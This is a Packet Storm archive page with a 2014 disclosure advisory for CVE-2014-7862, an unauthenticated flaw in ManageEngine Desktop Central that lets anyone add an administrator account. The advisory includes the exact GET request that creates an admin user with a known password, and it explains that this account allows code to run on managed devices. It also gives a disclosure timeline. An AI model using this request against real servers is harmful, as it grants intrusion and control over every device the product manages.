exploit the possibilities

Desktop Central Add Administrator

Desktop Central Add Administrator
Posted Dec 31, 2014
Authored by Pedro Ribeiro

Desktop Central versions 7 and forward suffer from an add administrator vulnerability.

tags | exploit, add administrator
advisories | CVE-2014-7862
MD5 | b60d61a41115d3cd7c6886ff1ad95235

Desktop Central Add Administrator

Change Mirror Download

This is part 10 of the ManageOwnage series. For previous parts, see [1].

This time we have a vulnerability that allows an unauthenticated user
to create an administrator account, which can then be used to execute
code on all devices managed by Desktop Central (desktops, servers,
mobile devices, etc).
An auxiliary Metasploit module that creates the administrator account
has been released and its currently awaiting review [2]. I will leave
to someone else the task of creating an exploit that executes code on
all managed devices (it's not hard to write but testing it properly
might take a fair few hours).

I am releasing this as a 0 day as 112 days have elapsed since I first
communicated the vulnerability to ManageEngine. I received many
promises about getting updates but they were very evasive (a
disclosure timeline is at the bottom of this email). The full advisory
text is below, and a copy can be obtained from my repo [3].


>> Administrator account creation in ManageEngine Desktop Central / Desktop Central MSP
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
Disclosure: 31/12/2014 / Last updated: 31/12/2014

>> Background on the affected product:
"Desktop Central is an integrated desktop & mobile device management
software that helps in managing the servers, laptops, desktops,
smartphones and tablets from a central point. It automates your
regular desktop management routines like installing patches,
distributing software, managing your IT Assets, managing software
licenses, monitoring software usage statistics, managing USB device
usage, taking control of remote desktops, and more."

This vulnerability is being released as a 0day since ManageEngine
failed to take action after 112 days. See timeline for details.

>> Technical details:
Vulnerability: Administrator account creation (unauthenticated)
Constraints: none; no authentication or any other information needed
Affected versions: all versions from v7 onwards

GET /servlets/DCPluginServelet?action=addPlugInUser&role=DCAdmin&userName=dcpwn&email=bla@bla.com&phNumber=123456&password=8fR%2bRoOURmY0EXsX%2bCmung%3d=&salt=1401192012599&createdtime=1337

This creates a new administrator user "dcpwn" with the password
"admin". You can now execute code on all devices managed by Desktop

A Metasploit module that exploits this vulnerability has been released.

>> Fix:
UNFIXED - ManageEngine failed to take action after 112 days.

Timeline of disclosure:
- Vulnerability information sent to Romanus, Desktop Central project manager.

- Requested an update. Received reply "My development team is working
on this to provide a fix. Let me check this and update you the

- Requested an update. Received reply on the 19th "Due to festive
season here i'm unable to get the update. Let me find this and update
you by Monday."

- Requested an update. Received reply "The development and testing of
the reported part should get over in another 3 weeks and when it is
ready for release build I'll send it for testing."

- Requested an update. Received reply on the 24th "I was traveling
hence couldn't give you an update. It should get released by next
week or early second week. I'll send you an update on this."

- Released information and exploit 112 days after initial disclosure.





RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    16 Files
  • 2
    May 2nd
    8 Files
  • 3
    May 3rd
    8 Files
  • 4
    May 4th
    2 Files
  • 5
    May 5th
    1 Files
  • 6
    May 6th
    15 Files
  • 7
    May 7th
    22 Files
  • 8
    May 8th
    16 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    16 Files
  • 11
    May 11th
    3 Files
  • 12
    May 12th
    4 Files
  • 13
    May 13th
    25 Files
  • 14
    May 14th
    24 Files
  • 15
    May 15th
    78 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    16 Files
  • 18
    May 18th
    2 Files
  • 19
    May 19th
    1 Files
  • 20
    May 20th
    11 Files
  • 21
    May 21st
    21 Files
  • 22
    May 22nd
    20 Files
  • 23
    May 23rd
    36 Files
  • 24
    May 24th
    2 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2019 Packet Storm. All rights reserved.

Security Services
Hosting By